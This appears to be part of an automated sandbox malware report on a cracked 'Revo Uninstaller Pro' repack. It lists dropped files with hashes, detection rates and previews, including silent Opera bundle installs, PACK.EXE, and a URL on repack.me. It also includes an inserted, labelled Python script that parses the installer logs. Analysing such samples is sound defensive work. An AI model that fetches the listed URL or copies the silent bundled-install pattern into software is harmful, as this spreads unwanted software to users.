                                                                                                                                                                          SSDEEP:96:PX5h//Lht1FAU68jVM8KSTc//ME4ClN10XCN+:vL/ZF88pM8KSg/2ClNIC8
                                                                                                                                                                          MD5:ADE9CE7ABFE878A4BC129731634767F0
                                                                                                                                                                          SHA1:129A542CC83983CA6C3A93E01C891BB267E7FD3F
                                                                                                                                                                          SHA-256:14AF71CA3B2AF49738D9DA4CAE60FE63EF208CE496812F5A0F41A6B22911D175
                                                                                                                                                                          SHA-512:2AA0E171CA6B0F570E96AFC18A8BE5C393D4D537893E8BB7F60385800D83848F30EC7C57031FF35A86FD2567A75202594985CEC97F259A7397044F004817DEF5
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:[1209/115408.145:INFO:installer_main.cc(475)] Opera installer starting - version 115.0.5322.77 Stable.[1209/115408.145:INFO:installer_main.cc(478)] Command line: "C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe" --silent --allusers=0 --server-tracking-blob=[...].[1209/115408.145:INFO:installer_main.cc(500)] Uninstall:0.[1209/115408.145:INFO:installer_main.cc(501)] Silent:1.[1209/115408.145:INFO:installer_main.cc(502)] Run Immediately0.[1209/115408.145:INFO:installer_main.cc(504)]
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (1572)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2997
                                                                                                                                                                          Entropy (8bit):5.6895746648906025
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:Gbb4hXTbpxX6QMdLOvadLndYwcVBJTleVnZ/Q5VEb6zClt3WbLf9JbAbOSbNbBb3:fXhM8KSTc//ME4hr6UnoP
                                                                                                                                                                          MD5:AEBE96FF2FFA5659A6A20B536895A9A9
                                                                                                                                                                          SHA1:3F491204A62A61C38305452F7713D9A7C3880EBC
                                                                                                                                                                          SHA-256:BF0A2EA802D96FABA07124F88634095D93E0D222F00DF5217E7E15AF33023A90
                                                                                                                                                                          SHA-512:F030425CCC20AB2EFE82991496A0D431C9F1B465CD8CA7A57A3E69BF7C987332B60AB441D2C9E8490447BEB7C71C1E14DBF206A1477745D30140C1A58F615486
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:[1209/115410.771:INFO:installer_main.cc(475)] Opera installer starting - version 115.0.5322.77 Stable.[1209/115410.771:INFO:installer_main.cc(478)] Command line: "C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=8040 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209115409" --session-guid=57f4b7c1-1875-4c3d-aada-fe1e595f9b71 --server-tracking-blob=ZTEzMzE3M2U4ODhkN2Y3YmE0ODQ3NmYwNmNlNmJmMDE4NmY4MzAzYmNmNWRmMWYyY
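The two installer logs above show the bundled Opera setup being run from the 7zSCAE7B8AA temp directory, first with --silent and then in --backend mode with --setdefaultbrowser=1, --pintotaskbar=1, --pintostartmenu=1 and --run-at-startup=1, i.e. a silent install that also changes the default browser and adds a startup entry. The Python below is an added example (not part of the report or of the Opera installer) that parses such Chromium-style installer logs, recovers the logged command line, tokenises it with Windows quoting rules, and lists the switches that alter the user's environment. `SAMPLE_LOG` is a constructed sample modelled on the previews, with one record per line and the server-tracking blob left out, and the set of switches treated as environment-changing is this example's own choice.

```python
import re

# Constructed sample, modelled on the installer_main.cc previews in this report:
# one record per line, tracking blob omitted. Not a file from the analysis.
SAMPLE_LOG = r"""[1209/115410.771:INFO:installer_main.cc(475)] Opera installer starting - version 115.0.5322.77 Stable
[1209/115410.771:INFO:installer_main.cc(478)] Command line: "C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --consent-given=0 --launchopera=1 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209115409" --initial-pid=8040
[1209/115410.771:INFO:installer_main.cc(500)] Uninstall:0
[1209/115410.771:INFO:installer_main.cc(501)] Silent:1
"""

# [MMDD/HHMMSS.mmm:LEVEL:source(line)] message
LOG_LINE = re.compile(r"^\[(\d{4})/(\d{6}\.\d{3}):(\w+):([^(]+)\((\d+)\)\] (.*)$")

# Switches that change the user's environment beyond the install folder.
# This set is the example's own choice; the report does not define one.
ENVIRONMENT_SWITCHES = {"setdefaultbrowser", "run-at-startup", "pintotaskbar",
                        "pintostartmenu", "enable-stats", "enable-installer-stats"}


def parse_log(text: str) -> list:
    """Split installer log lines into records; lines that do not match the format are skipped."""
    records = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            date, time, level, source, lineno, msg = m.groups()
            records.append({"date": date, "time": time, "level": level,
                            "source": source, "line": int(lineno), "msg": msg})
    return records


def extract_command_line(records: list):
    """Return the logged command line, or None if the installer never logged one."""
    for rec in records:
        if rec["msg"].startswith("Command line: "):
            return rec["msg"][len("Command line: "):]
    return None


def tokenize_windows_cmdline(cmdline: str) -> list:
    """Split on whitespace but keep double-quoted spans, and text glued to them, in one token."""
    return [tok.replace('"', "") for tok in re.findall(r'(?:"[^"]*"|\S)+', cmdline)]


def parse_switches(tokens: list):
    """First token is the executable; '--k=v' becomes {'k': 'v'}, a bare '--k' becomes {'k': True}."""
    exe, switches = tokens[0], {}
    for tok in tokens[1:]:
        if tok.startswith("--"):
            key, sep, value = tok[2:].partition("=")
            switches[key] = value if sep else True
    return exe, switches


def environment_changes(switches: dict) -> list:
    """Sorted names of environment-changing switches that were explicitly enabled ('1')."""
    return sorted(k for k, v in switches.items() if k in ENVIRONMENT_SWITCHES and v == "1")


def triage_installer_log(text: str) -> dict:
    """One-shot summary: executable, parsed switches, silent flag and environment changes."""
    recs = parse_log(text)
    cmd = extract_command_line(recs)
    if cmd is None:
        return {"records": len(recs), "exe": None, "switches": {}, "silent": False, "environment_changes": []}
    exe, sw = parse_switches(tokenize_windows_cmdline(cmd))
    silent = any(r["msg"].startswith("Silent:1") for r in recs) or "silent" in sw
    return {"records": len(recs), "exe": exe, "switches": sw, "silent": silent,
            "environment_changes": environment_changes(sw)}


if __name__ == "__main__":
    summary = triage_installer_log(SAMPLE_LOG)
    print(summary["exe"], "silent" if summary["silent"] else "interactive")
    print("environment changes:", ", ".join(summary["environment_changes"]))
```

The tokenizer deliberately avoids shlex: in POSIX mode it would eat the backslashes in Windows paths, and in non-POSIX mode a quote that starts mid-token (as in --installfolder="...") does not open a quoted span, so paths with spaces such as the package-dir-prefix would be split.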
                                                                                                                                                                          Process:C:\Users\user\Downloads\OperaSetup.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5740952
                                                                                                                                                                          Entropy (8bit):6.869655224466312
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:98304:Y5hxwD6666666666666666666666666666666x666666666666666fwwwwwwwwwt:H3gRKPR+UIYbL8v515oa7IC
                                                                                                                                                                          MD5:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                                                          SHA1:ACD4E95365DBD1256B8DDAA747C82AD8EF3D85CD
                                                                                                                                                                          SHA-256:2A4E429693A6DA362CD89967271831B99C88F0C6F696946E66852969D883233B
                                                                                                                                                                          SHA-512:76BBBD271182109E501482A23D136DA0C8A4669664A9B284C7C8249870D1CE47191BEFA69D668719B63225211A4F9DB8B63E3BAB41D5F35C33455B4D18832513
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."......d....S...................@...........................W.....t.X...@.................................8%..P.........Q..........pW..)....W..6...".......................!.......................'...............................text...;b.......d.................. ..`.rdata...............h..............@..@.data...$5...P.......8..............@....tls.................V..............@....rsrc.....Q.......Q..X..............@..@.reloc...6....W..8...8W.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5189528
                                                                                                                                                                          Entropy (8bit):6.8622234075396875
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                                                          MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                                                          SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                                                          SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                                                          SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5189528
                                                                                                                                                                          Entropy (8bit):6.8622234075396875
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                                                          MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                                                          SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                                                          SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                                                          SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5189528
                                                                                                                                                                          Entropy (8bit):6.8622234075396875
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                                                          MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                                                          SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                                                          SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                                                          SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5189528
                                                                                                                                                                          Entropy (8bit):6.8622234075396875
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                                                          MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                                                          SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                                                          SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                                                          SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5189528
                                                                                                                                                                          Entropy (8bit):6.8622234075396875
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                                                          MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                                                          SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                                                          SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                                                          SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):419886
                                                                                                                                                                          Entropy (8bit):7.320460842483817
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:q/iQb+ckQsH8TDRGKJkSvGUlYG2EY8NqK9XXHJoPNKAZzOndNyLMfjRxXdS:5Qnk3GDYKGcblBY8Y23mZ0dYmV0
                                                                                                                                                                          MD5:A868E9C0A97C2EF80602C0F6634913F8
                                                                                                                                                                          SHA1:9E3F70A600DDC17D018612B08854F702E24AE5D3
                                                                                                                                                                          SHA-256:691DF930404FB3CB974F183C849C4B1EDDC63EC3BCA579EEE24F8A59E702FE11
                                                                                                                                                                          SHA-512:611D06A34D007CB4D321400A318BA727B07971916F7207EF7D0D45383B7DC38361EA296904646F9079D9C42D87BD375F500D969BF9AA9C6906472655D84E6EF1
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'...Rich&...................PE..L....}|^..................................... ....@..................................D....@.........................@...4...t...<.... ..''...................P...!.....T............................B..@............ ..`...... ....................text............................... ..`.rdata..2.... ......................@..@.data....8..........................@....gfids..............................@..@.rsrc...''... ...(..................@..@.reloc...!...P..."..................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):35
                                                                                                                                                                          Entropy (8bit):4.036006945330954
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:N8MfXFLVt:2ghVt
                                                                                                                                                                          MD5:9D1787D69C72AE1531A6EFE6C058EBFA
                                                                                                                                                                          SHA1:847875E77AF8048EDF1A8A6D732D48F2A9B5CC96
                                                                                                                                                                          SHA-256:8C041E42595D9BF69B3293050B297A4BE644F57162DD362CA9C0E2EC15CE538D
                                                                                                                                                                          SHA-512:9A8CA8DFDEF274561C467B50C837C4BCA2A632995CEF8EDB565FA2872D4BD952EFD2EA0BDF32DA252CA0F949704245B8D335F1737B35F4D71ED35ADEFEE8F7C8
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:https://mail.repack.me/tsjtmfdm.pkg
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\PACK.EXE
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):174444
                                                                                                                                                                          Entropy (8bit):7.726875563462969
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:w+pMHMfwXZawAuL45TUQ+DjasBtroikmMUx+/fmmOUpIv1BUxXmXUzyh9F:w+p9wXMwYUQ+RAzG+/a0WXPT
                                                                                                                                                                          MD5:7ACCFDE96C04320BA099144A7BE710CC
                                                                                                                                                                          SHA1:7A7994CD05C4D93FC8B2897CF061E70F6D43ED7E
                                                                                                                                                                          SHA-256:1C668B85525A1F2C0634631472DFDECAFEE965AEC087D37BCEB737C1D7B433A1
                                                                                                                                                                          SHA-512:9A17BD9C9FC0E30EFDA6E7F091758FA3D3F23E41BF17E68C1D9F4F88C9807F328CE68EFCE1B08937C67FC786838215B600C7347FD705EE5DDEFEF8EA7AC15FD3
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L..."D.f.................h...J...@..e6............@.......................... ............@..............................................C...........................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x#..........................@....ndata...................................rsrc....C.......D..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:PC bitmap, Windows 3.x format, 165 x 110 x 32, image size 72600, resolution 3780 x 3780 px/m, cbSize 72654, bits offset 54
Category:dropped
Size (bytes):72654
Entropy (8bit):3.8234820419345263
Encrypted:false
SSDEEP:768:HoXxl+vlXEovFcdhahaUiIJpylVrg5u4ML:HiKqD6TiIJMX48
MD5:DEC435FEBCB6AFA7D48712C6B7B7F797
SHA1:ACF1290A64873D6286B9A6845291F87AC0C5D383
SHA-256:CF0BF3E2326C6D6C60C0EB72F23D2F57E02C50B1C08012EC0F3490AD7992F85A
SHA-512:84698DF0E436B4EF7B24AD2D59F2FC6AA960723D5B430C069B788C875332F8C36677A08C9DFD25ECBAE1A3D1472CC8D6A339CC3F8D00A7B4D7815B25F3AD8898
Malicious:false
Preview:BM........6...(.......n..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:PC bitmap, Windows 3.x format, 165 x 110 x 32, image size 72600, resolution 3780 x 3780 px/m, cbSize 72654, bits offset 54
Category:dropped
                                                                                                                                                                          Size (bytes):72654
                                                                                                                                                                          Entropy (8bit):4.179276254881405
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:9lE1kJkgWOWeRFeCenb4GirH7GIG6vy5uavIcEBCGeBHdFbrEfwcwV+:s1kgbmAFbrEfwcwA
                                                                                                                                                                          MD5:03E71E2F27CB3C60F2515B378D5934A7
                                                                                                                                                                          SHA1:E9B43186EB393D73EACC10E5F7F116E78FDC0CE1
                                                                                                                                                                          SHA-256:242603B8262926CB598FF0F8094775CF6A4EC4FA5DC8191B9CF226888AF9F96E
                                                                                                                                                                          SHA-512:E27B5BE6E99FD9295FEC301BCBB286175D833E51C9E0E651BB746FA6B8E4E196BF85115CD94B99D18E01D93D6699F111AA0EA9C240975E07BE20EAA3E4D6D550
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:BM........6...(.......n..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PC bitmap, Windows 3.x format, 165 x 110 x 32, image size 72600, resolution 3780 x 3780 px/m, cbSize 72654, bits offset 54
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):72654
                                                                                                                                                                          Entropy (8bit):3.8127911901112443
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:Mr6Nzec6u9cNl0aUxJiHKDVthKheoH0vs7wwGI8Ean8e++y/rnpqnfbTqFBrec22:Mm8c6xl0v42h1lUnMnz/Gy8KqiSD
                                                                                                                                                                          MD5:FC176015020E80F8266906905D30536D
                                                                                                                                                                          SHA1:AB5FB655990467D9158B52099B78F9FB63FF12EE
                                                                                                                                                                          SHA-256:475853E54B9B40AB85E3D7FEED1C3EE9CC4E34444E2068B63627A9235E5B6333
                                                                                                                                                                          SHA-512:378F736359052FC76088BCE0FAF9EE987EEC67BB3AC065E9FD8E93FA8CDFC808BB13B27A4A3BDF13FEF652A895885FBD36EF1514571184E31E98C075BA404FB5
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:BM........6...(.......n..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PC bitmap, Windows 3.x format, 165 x 110 x 32, image size 72600, resolution 3780 x 3780 px/m, cbSize 72654, bits offset 54
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):72654
                                                                                                                                                                          Entropy (8bit):4.191279757299406
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:oamCMUJkgWOWeRFeCenb4GirH7GIG6vy5uavIcEBCGeBHdFbrEfwcwV+:CpUgbmAFbrEfwcwA
                                                                                                                                                                          MD5:7B91A8BD71A1534BED881C524474AA66
                                                                                                                                                                          SHA1:4C85276D711DD163E47236E139271D4AB6BDA280
                                                                                                                                                                          SHA-256:3392CF7BA5655BC4624D133947E13683D4447FAFB1EA6926F070FC3FD3C499B1
                                                                                                                                                                          SHA-512:D17F48F339C4C79CE4118D59B22DF283FDF8DEE288BFEFCD7374663C47843C8F311B30A3D5853F62C4F10895197F9C9F6B122FE27B0B67F1D72EA4B87289A9D0
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:BM........6...(.......n..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):244224
                                                                                                                                                                          Entropy (8bit):5.312608585453437
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:NFf2FNF6iQraqoDDfbrH6ZgxkzStPpwGxqeujXj5Bif/Pa0A:NFfYCaqoDfb6mxk2LqHXj3if/Pa
                                                                                                                                                                          MD5:38F2B22967573A872426D05BDC1A1A70
                                                                                                                                                                          SHA1:ECAE471EB4E515E1006FCE645A82B70C8ACDA451
                                                                                                                                                                          SHA-256:83005624A3C515E8E4454A416693BA0FBF384FF5EA0E1471F520DFAE790D4AB7
                                                                                                                                                                          SHA-512:31BC78BB4EFC7C178C2C489B77D890B8806073180FBDD58156907C187CB73B0860701A9A2648DA1DA4930A8934C9A86B60EA5550315AFEBE833A681BCB4368E0
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
